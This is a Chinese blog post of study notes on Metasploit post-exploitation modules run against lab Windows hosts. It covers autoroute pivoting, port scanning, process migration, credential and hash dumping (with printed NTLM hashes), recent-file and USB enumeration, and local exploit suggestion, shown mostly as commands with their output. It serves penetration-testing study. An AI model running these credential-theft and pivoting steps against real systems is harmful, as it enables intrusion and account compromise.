Metasploit之Post Exploitation

最新推荐文章于 2022-02-04 18:28:54 发布
最新推荐文章于 2022-02-04 18:28:54 发布
阅读量1.7k 收藏
点赞数
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/73368181
版权

参考:
https://www.offensive-security.com/metasploit-unleashed/windows-post-gather-modules/
https://www.offensive-security.com/metasploit-unleashed/windows-post-manage-modules/

autoroute

这个很重要啊!
The “autoroute” post module creates a new route through a Meterpreter sessions allowing you to pivot deeper into a target network.

meterpreter > run post/windows/manage/autoroute SUBNET=192.168.218.0 ACTION=ADD

[*] Running module against V-MAC-XP
[*] Adding a route to 192.168.218.0/255.255.255.0...
meterpreter > 
Background session 5? [y/N]  y

之后就可以通过这个路由,来进一步渗透了。

msf exploit(ms08_067_netapi) > use auxiliary/scanner/portscan/tcp 
msf auxiliary(tcp) > set RHOSTS 192.168.218.0/24
RHOSTS => 192.168.218.0/24
msf auxiliary(tcp) > set THREADS 50
THREADS => 50
msf auxiliary(tcp) > set PORTS 445
PORTS => 445
msf auxiliary(tcp) > run

[*] Scanned 027 of 256 hosts (010% complete)
[*] Scanned 052 of 256 hosts (020% complete)
[*] Scanned 079 of 256 hosts (030% complete)
[*] Scanned 103 of 256 hosts (040% complete)
[*] Scanned 128 of 256 hosts (050% complete)
[*] 192.168.218.136:445 - TCP OPEN
[*] Scanned 154 of 256 hosts (060% complete)
[*] Scanned 180 of 256 hosts (070% complete)
[*] Scanned 210 of 256 hosts (082% complete)
[*] Scanned 232 of 256 hosts (090% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp) >

migrate

The “migrate” post module will migrate to a specified process or if none is given, will automatically spawn a new process and migrate to it.

meterpreter > run post/windows/manage/migrate 

[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1092)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 672
[*] New server process: Explorer.EXE (672)
meterpreter >

checkvm(检测是否在虚拟机中)

checks to see if the compromised host is a virtual machine. This module supports Hyper-V, VMWare, VirtualBox, Xen, and QEMU virtual machines.

meterpreter > run post/windows/gather/checkvm 

[*] Checking if V-MAC-XP is a Virtual Machine .....
[*] This is a VMware Virtual Machine
meterpreter >

credential_collector(收集机密信息)

harvests passwords hashes and tokens on the compromised host.

meterpreter > run post/windows/gather/credentials/credential_collector 

[*] Running module against V-MAC-XP
[+] Collecting hashes...
    Extracted: Administrator:7bf4f254f224bb24aad3b435b51404ee:2892d23cdf84d7a70e2eb2b9f05c425e
    Extracted: Guest:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
    Extracted: HelpAssistant:2e61920ebe3ed6e6d108113bf6318ee2:5abb944dc0761399b730f300dd474714
    Extracted: SUPPORT_388945a0:aad3b435b51404eeaad3b435b51404ee:92e5d2c675bed8d4dc6b74ddd9b4c287
[+] Collecting tokens...
    NT AUTHORITY\LOCAL SERVICE
    NT AUTHORITY\NETWORK SERVICE
    NT AUTHORITY\SYSTEM
    NT AUTHORITY\ANONYMOUS LOGON
meterpreter >

dumplinks(导出存在的快捷方式)

The “dumplinks” module parses the .lnk files in a users Recent Documents which could be useful for further information gathering.Note that, as shown below, we first need to migrate into a user process prior to running the module.

meterpreter > run post/windows/manage/migrate 

[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1096)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 1824
[*] New server process: Explorer.EXE (1824)
meterpreter > run post/windows/gather/dumplinks 

[*] Running module against V-MAC-XP
[*] Extracting lnk files for user Administrator at C:\Documents and Settings\Administrator\Recent\...
[*] Processing: C:\Documents and Settings\Administrator\Recent\developers_guide.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\documentation.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\Local Disk (C).lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\Netlog.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\notes (2).lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\notes.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\Release.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\testmachine_crashie.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\user manual.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\user's guide.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\{33D9A762-90C8-11d0-BD43-00A0C911CE86}_load.lnk.
[*] No Recent Office files found for user Administrator. Nothing to do.
meterpreter >

enum_applications(列举出安装的应用)

meterpreter > run post/windows/gather/enum_applications 

[*] Enumerating applications installed on WIN7-X86

Installed Applications
======================

 Name                                                              Version
 ----                                                              -------
 Adobe Flash Player 25 ActiveX                                     25.0.0.148
 Google Chrome                                                     58.0.3029.81
 Google Update Helper                                              1.3.33.5
 Google Update Helper                                              1.3.25.11
 Microsoft .NET Framework 4.6.1                                    4.6.01055
 Microsoft .NET Framework 4.6.1                                    4.6.01055
 Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148    9.0.30729.4148
 MySQL Connector Net 6.5.4                                         6.5.4
 Security Update for Microsoft .NET Framework 4.6.1 (KB3122661)    1
 Security Update for Microsoft .NET Framework 4.6.1 (KB3127233)    1
 Security Update for Microsoft .NET Framework 4.6.1 (KB3136000v2)  2
 Security Update for Microsoft .NET Framework 4.6.1 (KB3142037)    1
 Security Update for Microsoft .NET Framework 4.6.1 (KB3143693)    1
 Security Update for Microsoft .NET Framework 4.6.1 (KB3164025)    1
 Update for Microsoft .NET Framework 4.6.1 (KB3210136)             1
 Update for Microsoft .NET Framework 4.6.1 (KB4014553)             1
 VMware Tools                                                      10.1.6.5214329
 XAMPP 1.8.1-0                                                     1.8.1-0


[*] Results stored in: /root/.msf4/loot/20170501172851_pwk_192.168.0.6_host.application_876159.txt
meterpreter >

hashdump

The “hashdump” post module will dump the local users accounts on the compromised host using the registry.

meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...


Administrator:500:7bf4f254b222ab21aad3b435b51404ee:2792d23cdf84d1a70e2eb3b9f05c425e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:2e61920ebe3ed6e6d108113bf6318ee2:5abb944dc0761399b730f300dd474714:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:92e5d2c675bed8d4dc6b74ddd9b4c287:::


meterpreter >

usb_history

The “usb_history” module enumerates the USB drive history on the compromised system.

meterpreter > run post/windows/gather/usb_history 

[*] Running module against V-MAC-XP
[*] 
   C:                                                                Disk ea4cea4c 
   E:   STORAGE#RemovableMedia#8&3a01dffe&0&RM#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
   A:   FDC#GENERIC_FLOPPY_DRIVE#6&1435b2e2&0&0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
   D:   IDE#CdRomNECVMWar_VMware_IDE_CDR10_______________1.00____#3031303030303030303030303030303030303130#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

[*] Kingston DataTraveler 2.0 USB Device
=====================================================================================
   Disk lpftLastWriteTime                       Thu Apr 21 13:09:42 -0600 2011
 Volume lpftLastWriteTime                       Thu Apr 21 13:09:43 -0600 2011
             Manufacturer                               (Standard disk drives)
           ParentIdPrefix                                         8&3a01dffe&0 (   E:)
                    Class                                            DiskDrive
                   Driver          {4D36E967-E325-11CE-BFC1-08002BE10318}\0001

meterpreter >

local_exploit_suggester

查看还有哪些可以exploit的点?

msf > use post/multi/recon/local_exploit_suggester 
msf post(local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION          2                yes       The session to run this module on.
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf post(local_exploit_suggester) > run

[*] 192.168.101.129 - Collecting local exploits for x86/windows...
[*] 192.168.101.129 - 31 exploit checks are being tried...
[+] 192.168.101.129 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 192.168.101.129 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 192.168.101.129 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.101.129 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 192.168.101.129 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[*] Post module execution completed
caiqiiqi
关注
专栏目录
通过修改FILE_OBJECT文件路径来绕过杀毒软件查杀的Post-Exploitation技术
systemino的博客
08-01 904
Windows操作系统在确定进程映像FILE_OBJECT位置方面存在不一致性,这影响了非EDR(端点检测和响应)端点安全解决方案(如Microsoft Defender Realtime Protection)检测恶意进程中加载的正确二进制文件的能力。这种不一致性导致McAfee开发了一种新的Post-Exploitation绕过技术,我们称之为“进程重新映像(Process Reimaging...
Meterpreter Post-Exploitation分析
爱测未来团队博客
08-09 2265
Metasploit是一款开源的安全漏洞检测利用工具。它可以帮助用户识别安全问题,验证漏洞的缓解措施,并对某些软件进行安全性评估,同时它也是黑客手中的利器,恶意攻击者可以利用它来生成恶意的二进制文件和恶意文档进行一系列的攻击行为。
metasploit - post
Nixawk
04-20 1846
msf > use post/ use post/aix/hashdump use post/cisco/gather/enum_cisco use post/firefox/gather/cookies use post/firefox/gather/history use post/firefox/gather/passwords use post/firefox/gather/xss use
OSCP Learning Notes - Post Exploitation(1)
weixin_30645617的博客
07-29 264
Linux Post Exploitation Target Sever: Kioptrix Level 1 1. Search the payloads types. msfvenom -l payloads All the payload type in Metasploit are showing as below: Framework Paylo...
后渗透学习之Metasploitpost模块使用信息收集
来到了学渣的博客
02-22 2911
环境 Kali和win7是nat连接 Kali:192.168.10.145 Win7:192.168.10.143 如果Msf拿shell后出现乱码,输入chcp 65001即可 MSF的post模块 进入msf5 > search post,搜索post模块,发现有471个模块可使用,我挑一部分出来翻译大概看看是用来干嘛的 Linux: Window: 首先得拿一个cmd的s...
metasploit
qq_46303643的博客
03-19 510
一、 实验目的 熟悉Metasploit的基本操作; 针对一个系统的漏洞实施渗透。 二、实验内容 1.熟悉metasploit的几个基本命令 2.使用metasploit攻击靶机metasploitable 3.利用msf对MS10_018漏洞进行渗透测试 3.利用Armitage黑入metasploitable 三、实验环境 Kali-linux-2020.1 四、实验步骤 1.基本操作 1....
Metasploit
05-16
5. **Post-exploitation**:攻击成功后,如何进一步控制和利用目标系统是post-exploitation阶段的重点。Metasploit提供了多种工具来维持会话、提升权限、收集敏感信息等。 6. **Meterpreter**:Meterpreter是一种...
Metasploit Bootcamp
06-11
Following on from the previous chapter, Day 3 will focus on exploiting various types of service and client-side exploitation while Day 4 will focus on post-exploitation, and writing quick scripts ...
Metasploit渗透测试指南 修订版
09-21
它提供了一个集成的环境,用于开发、执行和管理攻击向量,包括exploits(利用代码)、payloads(有效负载)和post-exploitation(后渗透)工具。该框架使得安全专家能够有效地利用公开的漏洞信息,模拟黑客攻击,以...
arachni web漏洞扫描
09-20
arachni作为一款开源的扫描软件,在判断web脚本漏洞上的效率和精确度还是让人称赞的,arachni作为一款主流的开源扫描软件,当然要跟随趋势,可以很好的和metasploit配合使用,通过msf plugin,与metasploit达到无缝对接。
[Pentester Lab]PHP Include And Post Exploitation
CD的博客
04-11 1073
本文是Pentester Lab上的PHP Include And Post Exploitation实验。实验中使用了靶机(提供的ISO),以及一台云主机(用于实现反向shell)。 一、简介 大致步骤如下: 1. 指纹识别 2. 检测和利用PHP文件包含漏洞 3. 后期利用 二、指纹识别 telnet, nc, … Nikto 三、检测并利用PHP文件包含漏洞 ...
powershell exploit post-framework
cnbird's blog
08-31 739
https://github.com/mattifestation/PowerSploit
第四期_Metasploit 基础(三)Exploits《Metasploit Unleashed Simplified Chinese versionMetasploit官方文档教程中文版)》
Sno_WolF的博客
02-04 362
四、METASPLOIT 基础 3. Exploits 漏洞利用 Metasploit框架中的所有漏洞利用将分为两类:主动和被动。 a)主动 exploit 主动exploits将利用特定主机,运行直至完成,然后退出。 当外壳程序从受害者那里打开时,暴力破解模块将退出。 如果遇到错误,模块执行将停止。 您可以通过将-j传递给 exploit 命令来强制将激活的模块置于后台: msf exploit(ms08_067_netapi) > exploit -j [*] Exploit running
Metasploit -- 后渗透模块(POST)
weixin_41489908的博客
03-01 948
​给时间一点时间,让过去过去,让开始开始。。。 ---- 网易云热评 作用:获取目标主机后shell后,继续信息收集,提权 1、获取目标分区情况 run post/windows/gather/forensics/enum_drives 2、检测是否是虚拟主机 run post/windows/gather/checkvm 3、获取当前安装的应用程序 runpost/windows/gather/enum_applications 4、获取用户登录信息 run post/..
渗透测试——后渗透攻击
YT的博客
02-18 6294
Meterpreter 是一个提供了运行时刻可扩展远程 API 调用的攻击载荷模块,后渗透攻击脚本由 Meterpreter 客户端所解释,再远程调用 Meterpreter 服务端 (即运行在目标机上的攻击载荷) 提供的 API 来实现的。 1. persistence 后渗透攻击模块 persistence 帮助信息如下: 输入命令:run persistence -X -i 5 -p 4...
metasploit-学习7--显示post的模块的所有post信息
简单就是美
06-15 7353
不好意思,由于本文太长,我用程序生成此博文的锚点链接,可是一发布就没有。是不是csdn不支持锚点,还是我操作错误。在这里给大家带来的不便,还请见谅!  Name                                             Disclosure Date  Rank    Description    ----
metasploit - local_exploit_suggester
Nixawk
08-15 3240
msf post(local_exploit_suggester) > show options Module options (post/multi/recon/local_exploit_suggester): Name Current Setting Required Description ---- ---------------
初探Meterpreter
热门推荐
要不,单步调试走起?
12-06 1万+
强大的Meterpreter,让目标机像你的孩子一样听话~~
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值